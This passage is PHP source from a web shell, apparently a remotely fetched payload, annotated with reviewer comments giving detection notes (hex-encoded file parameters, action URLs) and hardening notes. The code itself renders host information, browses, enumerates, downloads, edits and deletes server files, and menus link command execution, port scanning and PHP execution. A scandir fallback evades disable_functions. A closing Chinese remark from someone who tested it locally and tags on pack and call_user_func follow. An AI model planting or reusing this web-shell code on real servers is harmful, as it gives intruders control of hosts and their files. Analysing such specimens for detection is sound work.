    // ^ Tail of a method that begins before this excerpt (presumably the
    //   byte_format() helper called further down); kept exactly as found.
    //
    // NOTE(review): everything below is the remotely fetched payload discussed in
    // the article, laid out one statement per line so it can be read. The class
    // header and the helpers class_html(), class_body(), show_html(), css(), js(),
    // mbstring(), gbk_mbstring(), dirpath(), host(), ip(), uname(), soft(),
    // php_version() and whoami() are not part of this excerpt. Treat the listing
    // as a specimen for analysis; the comments describe what the visible code does
    // and what a responder can look for.

    /**
     * Assemble the complete HTML page.
     *
     * Replaces {body}, {load_css} and {load_js} in the template returned by
     * class_html() with the results of body(), css() and js().
     */
    protected function html()
    {
        return str_replace(array(
            '{body}',
            '{load_css}',
            '{load_js}'), array(
            $this->body(),
            css(),
            js()), class_html());
    }

    /**
     * Render the page body for an asynchronous request.
     *
     * Joins the links from menu() and action() with " | ", substitutes them for
     * {menu} and {action} in the rendered body, and returns the result as a
     * JSON-encoded string.
     */
    protected function ajax()
    {
        $html = $this->body();
        $menu = join(" | ", $this->menu());
        $action = join(" | ", $this->action());
        $body = str_replace(array("{menu}", "{action}"), array($menu, $action), $html);
        return json_encode($body);
    }

    /**
     * Fill the body template with information about the host.
     *
     * The placeholders show what is collected and displayed on every page load:
     * host name, IP, uname, server software, PHP version, the account the code
     * runs as, the current directory, total disk space, a directory overview and
     * the file listing. For a responder this is the information that should be
     * assumed disclosed once the script has been requested.
     */
    protected function body()
    {
        return str_replace(array(
            '{host}',
            '{ip}',
            '{uname}',
            '{software}',
            '{php_version}',
            '{whoami}',
            '{current_dir}',
            '{space_total}',
            '{all_dir}',
            '{showfile}',
        ), array(
            $this->host(),
            $this->ip(),
            $this->uname(),
            $this->soft(),
            $this->php_version(),
            $this->whoami(),
            $this->current_dir(),
            $this->space_total(),
            $this->all_dir(),
            $this->showfile(),
        ), class_body());
    }

    /**
     * Build the top menu as a list of <a> elements.
     *
     * Each entry is array(label, href, css class). The labels (runtime strings,
     * left untouched) read: log out, run command, port scan, run PHP, PHP
     * settings, phpinfo, MySQL management (marked as a paid feature) and, on
     * Windows only, restart system. Entries with a 'javascript:;;;' href are
     * handled by client-side script that is not in this excerpt.
     *
     * Detection note: the server-side entries produce requests of the form
     * "?action=logout", "?action=phpinfo", "?action=viewinfo" and
     * "?action=restart" against the script itself, which are worth searching
     * for in access logs.
     *
     * @return array list of HTML link strings ($return is never initialised, so
     *               the result would be undefined if $menus were empty)
     */
    protected function menu()
    {
        // IS_WIN is defined outside this excerpt; presumably true on Windows hosts.
        if (IS_WIN) {
            $restart = array(
                "重启系统",
                KING_SELF . "?action=restart",
                'action_del');
        } else {
            $restart = null;
            // Marker used below to drop the null placeholder again.
            $unset = true;
        }
        $menus = array(
            array(
                "退出",
                KING_SELF . "?action=logout",
                null),
            array(
                "运行命令",
                'javascript:;;;',
                'run_command'),
            array(
                "端口扫描",
                'javascript:;;;',
                'click_port'),
            array(
                "运行php",
                'javascript:;;;',
                'run_php'),
            array(
                "php参数",
                KING_SELF . "?action=phpinfo",
                'action_del'),
            array(
                "phpinfo",
                KING_SELF . "?action=viewinfo",
                null),
            array(
                "mysql管理(需付费购买)",
                'javascript:;;;',
                'pay'),
            $restart,
        );
        // On non-Windows hosts the last element is the null $restart; remove it.
        if (isset($unset)) {
            array_pop($menus);
        }
        foreach ($menus as $menu) {
            $return[] = sprintf("<a class='%s' href=\"%s\">%s</a>", $menu[2], $menu[1], $menu[0]);
        }
        return $return;
    }

    /**
     * Build the file-operation toolbar as a list of <a> elements.
     *
     * Labels (runtime strings, left untouched) read: web root, script directory,
     * upload file, new file, new folder, archive current path (PHP), archive
     * current path (linux) and refresh page.
     *
     * Detection note: paths are never sent in clear text. The "file" parameter
     * carries bin2hex() output, so log searches for this script should look for
     * "action=view&file=" followed by a long hexadecimal string, and for
     * "action=packages" / "action=linuxpkg".
     *
     * @return array list of HTML link strings
     */
    protected function action()
    {
        $menus = array(
            array(
                "网站目录",
                KING_SELF . "?action=view&file=" . $this->webroot(),
                'action_del'),
            array(
                "文件目录",
                KING_SELF . "?action=view&file=" . $this->scriptroot(),
                'action_del'),
            array(
                "上传文件",
                'javascript:;;;',
                'upload'),
            array(
                "新建文件",
                "javascript:;;;",
                '_newfile'),
            array(
                "新建文件夹",
                "javascript:;;;",
                '_newfolder'),
            array(
                "打包当前路径(php功能)",
                KING_SELF . "?action=packages",
                'action_del packages'),
            array(
                "打包当前路径(linux功能)",
                KING_SELF . "?action=linuxpkg",
                'action_del packages'),
            array(
                "刷新本页",
                KING_SELF . "?action=view&file=" . bin2hex($_SESSION['dirpath']),
                'action_del'),
        );
        foreach ($menus as $menu) {
            $return[] = sprintf("<a class='%s' href=\"%s\">%s</a>", $menu[2], $menu[1], $menu[0]);
        }
        return $return;
    }

    /**
     * Render the listing of one directory as HTML rows.
     *
     * Directories come first, then files, each row produced from the show_html()
     * template. Every row links back to the script with a hex-encoded path and
     * one of the actions rename, rmdir, down, editfile or del.
     *
     * @param string|null $path hex-encoded directory path (decoded with
     *                          pack('H*', ...)); when empty, basedir() is used
     * @return string concatenated rows
     */
    protected function showfile($path = null)
    {
        $pathname = empty($path) ? $this->basedir() : pack('H*', $path);
        $filename = $this->scandir($pathname);
        if (isset($filename['dirs'])) {
            sort($filename['dirs']);
            foreach ($filename['dirs'] as $key => $value) {
                $basefile = $this->mbstring($pathname) . '/' . $value;
                $dirs[$key] = str_replace(array(
                    '{self}',
                    '{file}',
                    '{return_file}',
                    '{return_time}',
                    '{return_size}',
                    '{return_chmod}',
                    '{return_perms}',
                    '{is_folder}',
                ), array(
                    KING_SELF,
                    bin2hex($basefile), //1
                    $value,
                    date('Y-m-d H:i:s', $this->filemtime($basefile)),
                    // Size column for directories: a fixed label instead of a number.
                    '无',
                    // Last four octal digits of the mode, e.g. the "0755" form.
                    substr(sprintf('%o', $this->fileperms($basefile)), -4),
                    $this->perms($basefile),
                    sprintf('<a class="action_del" href="%s?action=rename&file=%s">重命名</a> | ',KING_SELF,bin2hex($basefile)).
                    sprintf('<a class="action_del" href="%s?action=rmdir&file=%s">删除</a>',KING_SELF,bin2hex($basefile)),
                ), show_html());
            }
            unset($key, $value, $basefile);
        }
        if (isset($filename['files'])) {
            sort($filename['files']);
            foreach ($filename['files'] as $key => $value) {
                $basefile = $this->mbstring($pathname) . '/' . $value;
                // NOTE(review): this $color is not used; it is recomputed in the
                // final loop below.
                $color = ($key + 1) % 2 ? 'dd' : 'fff';
                $files[$key] = str_replace(array(
                    '{self}',
                    '{file}',
                    '{return_file}',
                    '{return_time}',
                    '{return_size}',
                    '{return_chmod}',
                    '{return_perms}',
                    '{is_folder}',
                    '{.red}'), array(
                    KING_SELF,
                    bin2hex($basefile),
                    $value, //1
                    date('Y-m-d H:i:s', $this->filemtime($basefile)),
                    $this->byte_format($this->filesize($basefile)),
                    substr(sprintf('%o', $this->fileperms($basefile)), -4),
                    $this->perms($basefile),
                    sprintf('<a href="%s?action=down&file=%s">下载</a> | ', KING_SELF, bin2hex($basefile)) .
                    sprintf('<a class="action_del" href="%s?action=editfile&file=%s">编辑</a>',KING_SELF,bin2hex($basefile)).
                    ' | <a href="">重命名</a> | ' .
                    sprintf(' <a class="action_del" href="%s?action=del&file=%s">删除</a>', KING_SELF, bin2hex($basefile)),
                    // Highlights the row whose name equals KING_SELF, presumably
                    // the script's own file name (the constant is defined elsewhere).
                    ($value == KING_SELF) ? 'red' : null,
                ), show_html());
            }
        }
        if (!isset($dirs))
            $dirs = array();
        if (!isset($files))
            $files = array();
        $arr = array_merge($dirs, $files);
        // Alternate the row colour over the merged list.
        foreach ($arr as $k => $v) {
            $color = ($k + 1) % 2 ? 'fff' : 'dd';
            $res[] = str_replace(array('{color}'), array($color), $v);
        }
        // NOTE(review): $res is never initialised, so an empty directory reaches
        // join() with an undefined variable.
        return join(null, $res);
    }

    /**
     * Hex-encoded document root with backslashes turned into forward slashes.
     * Declared without a visibility keyword, so it is public.
     */
    function webroot()
    {
        return bin2hex(str_replace('\\', '/', $_SERVER["DOCUMENT_ROOT"]));
    }

    /**
     * Hex-encoded directory of the running script, backslashes normalised.
     * Declared without a visibility keyword, so it is public.
     */
    function scriptroot()
    {
        return bin2hex(str_replace('\\', '/', dirname($_SERVER["SCRIPT_FILENAME"])));
    }

    /**
     * Modification time of $path.
     *
     * The path first passes through gbk_mbstring() on Windows and mbstring()
     * elsewhere; both helpers are outside this excerpt and presumably convert
     * the file-name encoding.
     */
    protected function filemtime($path)
    {
        if (IS_WIN)
            $path = $this->gbk_mbstring($path);
        else
            $path = $this->mbstring($path);
        return filemtime($path);
    }

    /**
     * Raw permission bits of $path, after the same path conversion as filemtime().
     */
    protected function fileperms($path)
    {
        if (IS_WIN)
            $path = $this->gbk_mbstring($path);
        else
            $path = $this->mbstring($path);
        return fileperms($path);
    }

    /**
     * Size of $path in bytes, after the same path conversion as filemtime().
     */
    protected function filesize($path)
    {
        if (IS_WIN)
            $path = $this->gbk_mbstring($path);
        else
            $path = $this->mbstring($path);
        return filesize($path);
    }

    /**
     * Permission string in the style of "ls -l" (for example "-rw-r--r--").
     *
     * The first character is the file type taken from the high mode bits, followed
     * by three rwx triplets for owner, group and others. An unrecognised file type
     * returns '?????????' immediately, without the triplets.
     */
    protected function perms($path)
    {
        if (IS_WIN)
            $path = $this->gbk_mbstring($path);
        else
            $path = $this->mbstring($path);
        $perms = fileperms($path);
        // File type: socket, symlink, regular file, block device, directory,
        // character device, FIFO. The order matters because the masks overlap.
        if (($perms & 0xC000) == 0xC000) {
            $info = 's';
        } elseif (($perms & 0xA000) == 0xA000) {
            $info = 'l';
        } elseif (($perms & 0x8000) == 0x8000) {
            $info = '-';
        } elseif (($perms & 0x6000) == 0x6000) {
            $info = 'b';
        } elseif (($perms & 0x4000) == 0x4000) {
            $info = 'd';
        } elseif (($perms & 0x2000) == 0x2000) {
            $info = 'c';
        } elseif (($perms & 0x1000) == 0x1000) {
            $info = 'p';
        } else {
            $info = '?????????';
            return $info;
        }
        // Owner: read, write, execute; bit 0x0800 (setuid) turns x into s / - into S.
        $info .= (($perms & 0x0100) ? 'r' : '-');
        $info .= (($perms & 0x0080) ? 'w' : '-');
        $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
        // Group: bit 0x0400 (setgid) turns x into s / - into S.
        $info .= (($perms & 0x0020) ? 'r' : '-');
        $info .= (($perms & 0x0010) ? 'w' : '-');
        $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
        // Others: bit 0x0200 (sticky) turns x into t / - into T.
        $info .= (($perms & 0x0004) ? 'r' : '-');
        $info .= (($perms & 0x0002) ? 'w' : '-');
        $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
        return $info;
    }

    /**
     * Remember $path as the current directory in $_SESSION['dirpath'] and return it.
     */
    protected function setpath($path)
    {
        $_SESSION['dirpath'] = $path;
        return $path;
    }

    /**
     * Current directory for display: the session value if set, otherwise
     * basedir(), passed through dirpath() (defined outside this excerpt).
     */
    protected function current_dir()
    {
        $path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : $this->basedir();
        return $this->dirpath($path);
    }

    /**
     * Starting directory: the session value if set, otherwise the directory that
     * contains this script. The chosen path is written back to the session.
     */
    protected function basedir()
    {
        $path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : str_replace('\\', '/', dirname(__file__));
        $this->setpath($path);
        return $path;
    }

    /**
     * Top-level directory overview: drive letters on Windows, entries of "/" elsewhere.
     */
    protected function all_dir()
    {
        if (!IS_WIN) {
            return $this->scanlinux();
        } else {
            return $this->scanwindows();
        }
    }

    /**
     * List the directories directly under "/" as HTML links.
     *
     * Returns nothing when an open_basedir restriction is configured, so on such
     * hosts this part of the page stays empty.
     */
    protected function scanlinux()
    {
        if (ini_get('open_basedir'))
            return;
        $pathname = '/';
        return $this->scandir($pathname, true);
    }

    /**
     * Probe the drive letters A to Z with is_dir() and return the existing ones as
     * HTML links joined with " | ".
     *
     * NOTE(review): $dirs is never initialised, so join() receives an undefined
     * variable when no drive is found.
     */
    protected function scanwindows()
    {
        $range = range('A', 'Z');
        foreach ($range as $dir) {
            if (is_dir(sprintf('%s:', $dir))) {
                $dirs[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex($dir . ':'), $dir);
            }
        }
        return join(' | ', $dirs);
    }

    /**
     * Enumerate $path.
     *
     * With $dir true the result is a " | "-joined string of HTML links, one per
     * sub-directory, each pointing at the hex-encoded form of '/' . name. With
     * $dir false the result is array('dirs' => ..., 'files' => ...) holding the
     * entry names.
     *
     * Hardening note: the method consults disable_functions and, when scandir is
     * listed there, switches to DirectoryIterator. Listing scandir in
     * disable_functions therefore does not stop this code from enumerating
     * directories; filesystem permissions and open_basedir are the controls that
     * matter here.
     *
     * @param string $path directory to read
     * @param bool   $dir  true for the HTML link form, false for the array form
     */
    protected function scandir($path, $dir = false)
    {
        // strpos() yields false when 'scandir' is absent from disable_functions,
        // which makes the negation true and selects the scandir() branch.
        if ($dir == true && !strpos(ini_get('disable_functions'), 'scandir')) {
            $class = scandir($path);
            foreach ($class as $key => $fileinfo) {
                if ($fileinfo == '.' || $fileinfo == '..')
                    continue;
                if (is_dir($path . '/' . $fileinfo)) {
                    $files[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex('/' . str_replace('\\', '/', $fileinfo)), str_replace('\\', '/', $fileinfo));
                }
            }
            return join(' | ', $files);
        }
        // First try scanning with scandir()
        if (!strpos(ini_get('disable_functions'), 'scandir')) {
            $root = scandir($path);
            foreach ($root as $key => $value) {
                if ($value == '.' || $value == '..')
                    continue;
                if (is_dir($path . '/' . $value)) {
                    $dirs[] = $this->mbstring(str_replace('\\', '/', $value));
                }
                if (is_file($path . '/' . $value)) {
                    $files[] = $this->mbstring(str_replace('\\', '/', $value));
                }
            }
            return array('dirs' => $dirs, 'files' => $files);
        }
        // Fallback path, reached when the scandir() branches above were skipped.
        $class = new DirectoryIterator($path);
        if ($dir == true) {
            foreach ($class as $key => $fileinfo) {
                if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..')
                    continue;
                if ($fileinfo->isDir()) {
                    $files[] = sprintf('<a class="action_del" href="%s?action=view&file=%s">%s</a>', KING_SELF, bin2hex('/' . str_replace('\\', '/', $fileinfo->getFilename())), str_replace('\\', '/', $fileinfo->getFilename()));
                }
            }
            return join(' | ', $files);
        }
        foreach ($class as $key => $fileinfo) {
            if ($fileinfo->getFilename() == '.' || $fileinfo->getFilename() == '..')
                continue;
            if ($fileinfo->isFile()) {
                $files[] = $this->mbstring(str_replace('\\', '/', $fileinfo->getFilename()));
            }
            if ($fileinfo->isDir()) {
                $dirs[] = $this->mbstring(str_replace('\\', '/', $fileinfo->getFilename()));
            }
        }
        return array('dirs' => $dirs, 'files' => $files);
    }

    /**
     * Total size of the disk that holds the current directory, formatted by
     * byte_format(). Returns the fixed string '0B' when disk_total_space appears
     * in disable_functions.
     */
    protected function space_total()
    {
        $path = !empty($_SESSION['dirpath']) ? $_SESSION['dirpath'] : dirname(__file__);
        $dis = explode(',', ini_get('disable_functions'));
        if (in_array('disk_total_space', $dis)) {
            return '0B';
        }
        return $this->byte_format(disk_total_space($path));
    }

    // Split the current path into its parts (this comment introduces code that
    // lies past the end of the excerpt)
本地测试了一下它的功能,点评下:功能太尼玛简单咯
标签:pack, call_user_func